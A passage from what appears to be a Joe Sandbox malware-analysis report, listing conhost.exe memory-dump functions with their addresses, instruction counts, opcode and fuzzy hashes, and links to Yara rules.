                                • Opcode ID: 7c7faa8e17876c3b12be16625feaa4ce70bf535ee600c411307a6bd2c0d81c67
                                • Instruction ID: 110a497402b66cea9ea9e3dde4c3300fa4cabdb1d602848acbe512ad9e3f5bb1
                                • Opcode Fuzzy Hash: 7c7faa8e17876c3b12be16625feaa4ce70bf535ee600c411307a6bd2c0d81c67
                                • Instruction Fuzzy Hash: 1F928031E1CD5A9FEA98FA2894517B473E2FF54B94F1441B9D00ED3283CE38AC828B45
                                Function 00007FF848EA1290 Relevance: 1.3, Instructions: 1251COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848ea0000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 788443be3a67cb91f23a238adfc497f4a05fa08019cb79b6d5f416d83b46f3a6
                                • Instruction ID: 6a86f326a0fb2fa0ed7b23778194e918dd812c130b68b666e764b5ec9c888c3f
                                • Opcode Fuzzy Hash: 788443be3a67cb91f23a238adfc497f4a05fa08019cb79b6d5f416d83b46f3a6
                                • Instruction Fuzzy Hash: BF929121E1CE5A9FEB98FA2894517B573E2FF54B94F0401B9D40ED3282DF39AC428B45
                                Function 00007FF848E90E43 Relevance: .2, Instructions: 173COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e6232f682b7d80da3e8fd20b27fdc673f958d30b46a66212091f00f0ca94c903
                                • Instruction ID: d88433fe49f322dc1051fb82e76784ece3e267c00953d3e99409963f286b21ef
                                • Opcode Fuzzy Hash: e6232f682b7d80da3e8fd20b27fdc673f958d30b46a66212091f00f0ca94c903
                                • Instruction Fuzzy Hash: F151C171A18A999EE388EB6C98597B97FE0FB4676CF4001BEC009D37D1EBB91411C744
                                Function 00007FF848E90940 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: cK_H
                                • API String ID: 0-826043881
                                • Opcode ID: 3384eb20a582fa1ee269aeaeedff95bb88d9b85cc78af54bd1c42f8678bbf374
                                • Instruction ID: 092f1e81ddf243aec1d2d88fcda6e3859b03bc3b3c7e9b638eae539e5f41006a
                                • Opcode Fuzzy Hash: 3384eb20a582fa1ee269aeaeedff95bb88d9b85cc78af54bd1c42f8678bbf374
                                • Instruction Fuzzy Hash: 68512471A0CB044FE748FA5CA84667577E1FB99764F14017EE08DC3296EE34AC0287C6
                                Function 00007FF848EA58E5 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848ea0000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: J_^
                                • API String ID: 0-3886167048
                                • Opcode ID: be8be80754a69c2d15667cd94bd26df99c7e1121fa5398fd96d0088532e6ead2
                                • Instruction ID: 67c78866700740e542135ad2fe59a047409de725918a84f2e3579ab8a5114fd4
                                • Opcode Fuzzy Hash: be8be80754a69c2d15667cd94bd26df99c7e1121fa5398fd96d0088532e6ead2
                                • Instruction Fuzzy Hash: 45F02731B1CA854FC70DF72CD8990B4B7D1FF9A51674841BAC04ACA283DD15D88AC745
                                Function 00007FF848EA3F79 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848ea0000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: I
                                • API String ID: 0-3707901625
                                • Opcode ID: 215c22fc969fc8a3535ed69e21c2a384eed3ae1489d706343bcea26ee78443c8
                                • Instruction ID: a95d28783114bf79dd5cead7ac799e381de58f3995693e8b2e4cc44274c15fba
                                • Opcode Fuzzy Hash: 215c22fc969fc8a3535ed69e21c2a384eed3ae1489d706343bcea26ee78443c8
                                • Instruction Fuzzy Hash: ECE01A6154E7C04FCB4AEB7888698557FA0AF6721078A40EFC045CF1B3E62D8849C701
                                Function 00007FF848E90908 Relevance: .1, Instructions: 118COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction ID: b4f9bfcc1c1dbd69ca597215f88b331fe7fe4d34ce35816be2a24c0538839b68
                                • Opcode Fuzzy Hash: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction Fuzzy Hash: 4821EA3170CC194FD768EA5CE889DB973D1FF9932170501BAE58EC7125E961EC8287C5
                                Function 00007FF848E90998 Relevance: .1, Instructions: 96COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ef81794de78aeccd111955fa7923b44bddd9a7afd5da713b3f8738e6877e8892
                                • Instruction ID: b4f894f2aa295b951896d040b64a8cc4e9f10776e7bad61302a353dff3157e23
                                • Opcode Fuzzy Hash: ef81794de78aeccd111955fa7923b44bddd9a7afd5da713b3f8738e6877e8892
                                • Instruction Fuzzy Hash: AF212B20B1CD195FE788B76C945A77972D6FB99758F1000FAE40DC33E7DE68AC428684
                                Function 00007FF848E9116D Relevance: .1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2b12833865294831fa55e13c7fa5a1ff6f4a55ad73222f3a01e6111f104da914
                                • Instruction ID: ae9ec6c10e72c6acd947976d5479c21f17694d9d9b5fe78e2c679d95476c0045
                                • Opcode Fuzzy Hash: 2b12833865294831fa55e13c7fa5a1ff6f4a55ad73222f3a01e6111f104da914
                                • Instruction Fuzzy Hash: 4531C231A0C54A8FEB45FB68C854AF97BF0FF26340F0401BAC009D7292EB78A941CB50
                                Function 00007FF848E90C25 Relevance: .1, Instructions: 84COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 708fd598c065309b6541ab05387ea6579458b0a2b96279e759eeba44057c0858
                                • Instruction ID: 00d6a7c14118ac430a6604ed35b7cdd95eb0fb2f73c0584fd6f1d0f02ca34c5c
                                • Opcode Fuzzy Hash: 708fd598c065309b6541ab05387ea6579458b0a2b96279e759eeba44057c0858
                                • Instruction Fuzzy Hash: 05214B36A0D649AFE716B7B8D8010EC7B60FF423A4F4881B3C0088B1D3DB78254AC799
                                Function 00007FF848E908F8 Relevance: .1, Instructions: 68COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction ID: cf38bec96cb45d447ad1078e5236fba8e43c672cd2e68cf8dd23c29f6f354312
                                • Opcode Fuzzy Hash: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction Fuzzy Hash: 6F01FC31F0D91D0F9568E15E944A93673C2E7C6674B191279D84FC3255DEA0AC5342C4
                                Function 00007FF848E96AC4 Relevance: .1, Instructions: 67COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5fb82689ff97822559538930a903d19e1158349152a690a6b05bdecf34d300b4
                                • Instruction ID: ca097b29223831f7f100c3222b2cbb183a9c28f1627fe038b4603d63851eccef
                                • Opcode Fuzzy Hash: 5fb82689ff97822559538930a903d19e1158349152a690a6b05bdecf34d300b4
                                • Instruction Fuzzy Hash: 0E21FF30D0852DCFDBA9EB04C495BA9B3B1FB58355F1041BAC00E93290DBB5ADC0CB45
                                Function 00007FF848E966F5 Relevance: .1, Instructions: 62COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a8221350571243b20b4e9697f55943530a9d939b8a19f69a9e69d0ae770dfad8
                                • Instruction ID: 18ea9d70cdd63149e9f361345f8a36b7f17371ca0cd84ded221ede88125e5fc5
                                • Opcode Fuzzy Hash: a8221350571243b20b4e9697f55943530a9d939b8a19f69a9e69d0ae770dfad8
                                • Instruction Fuzzy Hash: B6116131E188099FEB94FB7C9059A6863D1FF68394F4400B5D40EC72A7DE68DC868B44
                                Function 00007FF848E90C38 Relevance: .1, Instructions: 55COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: decf81c4f982908bcc34f923b849cc09361c72faca74904887ed8a0f23aaf13d
                                • Instruction ID: 26f42adde0ec78df75b34a737ac428a8f5318236501f5cf9abfc03128a487b2b
                                • Opcode Fuzzy Hash: decf81c4f982908bcc34f923b849cc09361c72faca74904887ed8a0f23aaf13d
                                • Instruction Fuzzy Hash: 3E11C231A0D7899FE702FBB888551AC7BB0FF42394F5544F7C044DB2A2D6781649CB95
                                Function 00007FF848E90C40 Relevance: .0, Instructions: 49COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4d2618250addc08769adf86ee29ab295a5e2dc34272934cd9fc2a2b0e315111c
                                • Instruction ID: 37ee0b4aec60d2667a370f72349aef8808cfdad5a951eea69653529b7930b41e
                                • Opcode Fuzzy Hash: 4d2618250addc08769adf86ee29ab295a5e2dc34272934cd9fc2a2b0e315111c
                                • Instruction Fuzzy Hash: BF11AD31A0D7899FE706FBB888550AC7FB0FF42394F5541F6C044DB2A2D6782A49CB95
                                Function 00007FF848E90C48 Relevance: .0, Instructions: 43COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 09ddbb158f2b8f4bc2322e2d7f9fd1fc0969d01b76312e455351d8522a9537c7
                                • Instruction ID: a815f573088b94aee8fb7e34eba6de2f4270d9db5fa6abb580fa19fa32bb54a6
                                • Opcode Fuzzy Hash: 09ddbb158f2b8f4bc2322e2d7f9fd1fc0969d01b76312e455351d8522a9537c7
                                • Instruction Fuzzy Hash: 2A019E3190D7899FE706FBB8C84409CBFB0FF42344F5541E6C044DB2A2D6786A48CB81
                                Function 00007FF848E90C50 Relevance: .0, Instructions: 38COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ef398adeb80fbd3785f66ec4de651f706265fc963689c4077fc2c0da828842a3
                                • Instruction ID: 07c0158dbfeedd7d846d936881780579ff7598f1786c0300fe9fa27aca73a833
                                • Opcode Fuzzy Hash: ef398adeb80fbd3785f66ec4de651f706265fc963689c4077fc2c0da828842a3
                                • Instruction Fuzzy Hash: 8C018F30D0D789AFE706FBB488540ACBFB0FF02348F5441E6C044DB296DA785A44CB45
                                Function 00007FF848EA44B0 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848ea0000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 819fd19c7363a49321a40d2d05c5a705dff6f03392342c6d540fa7b98fa4eb34
                                • Instruction ID: c6bd2fc56fd5847e7ba348db04c0ebe285c0c75d476cb67d150a26e25d570bb2
                                • Opcode Fuzzy Hash: 819fd19c7363a49321a40d2d05c5a705dff6f03392342c6d540fa7b98fa4eb34
                                • Instruction Fuzzy Hash: B4F05E34E0D64B8FEB58EB98C4505FEB7B1FF44751F00463AD41AD6689DF3469408B94
                                Function 00007FF848EA5598 Relevance: .0, Instructions: 23COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848ea0000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5aab9105ceac1501b9ed8e79bf0673273df8f8b28c40e5d33f0700872f877a4c
                                • Instruction ID: 593afccc5975e9f7105026adf173e4d5143f4f01ade5126373c470672fc3093f
                                • Opcode Fuzzy Hash: 5aab9105ceac1501b9ed8e79bf0673273df8f8b28c40e5d33f0700872f877a4c
                                • Instruction Fuzzy Hash: 00D05E30B60A094B8B4CB62D8458434B3D2F7AA2067D45278940BC2281ED25ECC68B84
                                Function 00007FF848E9526D Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction ID: 4874c647f61bfd1c0424b24d179a3e7ae5a382ffad72da176d1e385fb71cf967
                                • Opcode Fuzzy Hash: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction Fuzzy Hash: 8BE0E531E0D0068EF760BAD8D0003BD22A5AF84388F550079D92DE72C6CF7AAC418648
                                Function 00007FF848E90B95 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c9a7ebac4dbcc1b492641d0918653c0b04b6c1be29c3e3837045c21b23b8b416
                                • Instruction ID: 9d040bbed256630ae8fd7967054e32ca68bd4389d4f1de29088fcbb7a2c8e419
                                • Opcode Fuzzy Hash: c9a7ebac4dbcc1b492641d0918653c0b04b6c1be29c3e3837045c21b23b8b416
                                • Instruction Fuzzy Hash: D4D0A73161D54A8FE745B778D8498547B90FB1F314BC920E1D00CC7261D65448558701
                                Function 00007FF848E90D30 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction ID: e65d8228638dd825b5de3031fc224d67e4a94078b2cdfd46187ec1436de23706
                                • Opcode Fuzzy Hash: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction Fuzzy Hash: A4E01234A0C20ADFE700FB94C4846AD7761FB51355F504265D41187289DBB86684C684
                                Function 00007FF848EA4CA3 Relevance: .0, Instructions: 14COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848ea0000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c0c7d8910fa8edb013cf39d84e77962b63d23f5184028abda98529c5d3d5d0f8
                                • Instruction ID: 3d90096790b864152a8fa73a9ee40d690075b896381298a92a5de2785ea278bc
                                • Opcode Fuzzy Hash: c0c7d8910fa8edb013cf39d84e77962b63d23f5184028abda98529c5d3d5d0f8
                                • Instruction Fuzzy Hash: 97D0C930D0C656CFEA49BA489841ABA33A1FF45789F014475EE4E83187CF78A8528A59
                                Function 00007FF848E906A5 Relevance: .0, Instructions: 13COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction ID: 7dfd813d5a94c95751d53650d402260dc67e6a49cb757f27893adb77e58464f3
                                • Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction Fuzzy Hash: 68C04C06D5E52F09F455B1EE54460ECA1407FD96D8FD50172D51C404C29FED20D5415E
                                Function 00007FF848E90B18 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b2b767db43ab861b6472bc43987cfc9b405dc4539c5e1ec182c4e5c5dd8ab7c4
                                • Instruction ID: 821f2b7c0af6af7d6f62a01d7a39af9af20f104bd01caa2ba1cfd0084e036ee5
                                • Opcode Fuzzy Hash: b2b767db43ab861b6472bc43987cfc9b405dc4539c5e1ec182c4e5c5dd8ab7c4
                                • Instruction Fuzzy Hash: B0C04C305158198FC954F76DC98595476A0FB0E215BD501D0E40DC7171E66ADC95C745
                                Function 00007FF848E912D8 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction ID: b85895e8883aa790b9a0407e17e5c415c608bc80569033a9909c8476f139b02a
                                • Opcode Fuzzy Hash: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction Fuzzy Hash: 55C08C304108088FC908FB28C88480433A0FF09204BC60090E009C7170E269DCC1C740
                                Function 00007FF848E935AD Relevance: .0, Instructions: 10COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab4d44619bca8bb13d48392295d185b6f17847caacda3f33adffe285e4bc6ecb
                                • Instruction ID: c6008dc64bb912bab3cf08655a31729d5835d4840ac7a539880ccb894a26876d
                                • Opcode Fuzzy Hash: ab4d44619bca8bb13d48392295d185b6f17847caacda3f33adffe285e4bc6ecb
                                • Instruction Fuzzy Hash: C3C08C06F0DC2A9AE2952254142027E0046DF80B8CF485071E00E872CADE1C190106CA
                                Function 00007FF848E906C8 Relevance: .0, Instructions: 8COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.2533647454.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction ID: 381b4269f8b35b75fbeebd4794d7e36e47f11862b5f9ffc51a323fd9870811af
                                • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction Fuzzy Hash: 04B01201C6E40F04E41431FA08420E870407BC8188FC10070D80C4008199DD1094024A

                                Executed Functions

                                Function 00007FF848E90D48 Relevance: 1.5, Strings: 1, Instructions: 267COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: 5X_H
                                • API String ID: 0-3241812158
                                • Opcode ID: 2770e21825e3bf326abcad56b103fce2cfcbdb578424206681ed3a3a1683835a
                                • Instruction ID: dd8e43f1a6f65da2ba6e4c9fa572d7b683f044e733d0a9b0ed2c14999f69d882
                                • Opcode Fuzzy Hash: 2770e21825e3bf326abcad56b103fce2cfcbdb578424206681ed3a3a1683835a
                                • Instruction Fuzzy Hash: B8913F71D1CA898FE789EB6888697B87FE0FB9A354F4400BAC009D73D2DBB91815C701
                                Function 00007FF848EA10AF Relevance: 1.3, Instructions: 1316COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848ea0000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 508315cad35eac4a9640f2add2371cccde68bb479b448096e7d3961b4fcca4de
                                • Instruction ID: 50641354eb0398bd69fc7a8f514b3f10778182a042490ea959b568775c3a3492
                                • Opcode Fuzzy Hash: 508315cad35eac4a9640f2add2371cccde68bb479b448096e7d3961b4fcca4de
                                • Instruction Fuzzy Hash: F9928031E1C95A9FEB98FA2894557B573A2FF58B80F1445B9D00ED32C3DE38AC828745
                                Function 00007FF848EA1290 Relevance: 1.3, Instructions: 1251COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848ea0000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 06f8079e5c80f374e846c83fe157ae231054c44c6a84756d3c8ea40dbcf4474d
                                • Instruction ID: 7d2edfe29217fb5e519ba395de4adb490ca647a49a374b664019a44c47d6bb92
                                • Opcode Fuzzy Hash: 06f8079e5c80f374e846c83fe157ae231054c44c6a84756d3c8ea40dbcf4474d
                                • Instruction Fuzzy Hash: 84928021E1CA5A9FEB98FA2894557B573E2FF54B80F0441B9D40ED32C2DF39AC428745
                                Function 00007FF848E90E43 Relevance: .2, Instructions: 173COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9a613f1f8dcdacdffcd3464eb736d001e58b22e96ddef051174709a4262afb68
                                • Instruction ID: c606b0cecd00ce34f43e28780dff9fdd32e58134e702a0a5d0a6744fd3313f01
                                • Opcode Fuzzy Hash: 9a613f1f8dcdacdffcd3464eb736d001e58b22e96ddef051174709a4262afb68
                                • Instruction Fuzzy Hash: 1B51E175A1CA998EE388EB6C88697B97FE0FB8A364F4001BEC009D33D1DBB51425C744
                                Function 00007FF848E90908 Relevance: .1, Instructions: 118COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction ID: b4f9bfcc1c1dbd69ca597215f88b331fe7fe4d34ce35816be2a24c0538839b68
                                • Opcode Fuzzy Hash: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction Fuzzy Hash: 4821EA3170CC194FD768EA5CE889DB973D1FF9932170501BAE58EC7125E961EC8287C5
                                Function 00007FF848E90998 Relevance: .1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2e644f0f5c94ad7c90b28055843ad4759c4834c0676539cf304d159c34df4cf3
                                • Instruction ID: f7c85285afaf05728c3506b0d1da69bff1746e86c4d1037fc59becdeaf099e99
